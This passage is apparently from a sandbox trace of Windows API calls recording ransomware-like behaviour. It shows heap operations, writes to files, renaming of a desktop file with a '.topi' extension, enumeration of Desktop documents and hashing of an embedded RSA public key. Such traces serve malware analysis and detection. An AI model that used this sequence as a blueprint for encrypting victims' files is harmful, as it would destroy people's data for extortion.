(in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.403] GetCurrentThreadId () returned 0x8c4 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1670 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.404] GetCurrentThreadId () returned 0x8c4 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fe8 [0094.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9000 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fd0 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9018 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fe8 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fe8 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.406] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fe8 | out: hHeap=0x680000) returned 1 [0094.406] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x320fab0 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.406] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9018 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9000 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fd0 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fb8 | out: hHeap=0x680000) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3808 | out: hHeap=0x680000) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.407] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0xf710, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0xf710, lpOverlapped=0x0) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.407] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xf715, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.407] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.407] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0094.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.408] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.408] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0094.408] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.408] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.408] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.408] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.408] CloseHandle (hObject=0x6a8) returned 1 [0094.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0094.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0094.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0094.412] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cSYYXp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\csyyxp.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cSYYXp.gif.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\csyyxp.gif.topi")) returned 1 [0094.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.412] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.414] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.414] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned=".ini" [0094.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.414] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3faee7e0, ftCreationTime.dwHighDateTime=0x1d5c5d9, ftLastAccessTime.dwLowDateTime=0x927ce520, ftLastAccessTime.dwHighDateTime=0x1d5b9dc, ftLastWriteTime.dwLowDateTime=0x927ce520, ftLastWriteTime.dwHighDateTime=0x1d5b9dc, nFileSizeHigh=0x0, nFileSizeLow=0xf72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="edcuZL9YV.odt", cAlternateFileName="EDCUZL~1.ODT")) returned 1 [0094.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.414] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.414] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.414] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\edcuZL9YV.odt") returned=".odt" [0094.414] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\edcuZL9YV.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\edcuzl9yv.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.414] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=3954) returned 1 [0094.414] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.418] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xf4c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.418] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.419] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.419] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xf72, lpOverlapped=0x0) returned 1 [0094.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.419] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.419] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.420] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.420] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.420] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.420] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.420] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.420] GetLastError () returned 0x0 [0094.420] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.420] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.420] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.420] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.420] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.421] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.421] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xf70) returned 0x99e3958 [0094.421] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.421] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3808 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fb8 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3970 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fd0 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9000 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9018 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.421] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.421] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9000 | out: hHeap=0x680000) returned 1 [0094.421] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9018 | out: hHeap=0x680000) returned 1 [0094.421] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.421] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.421] 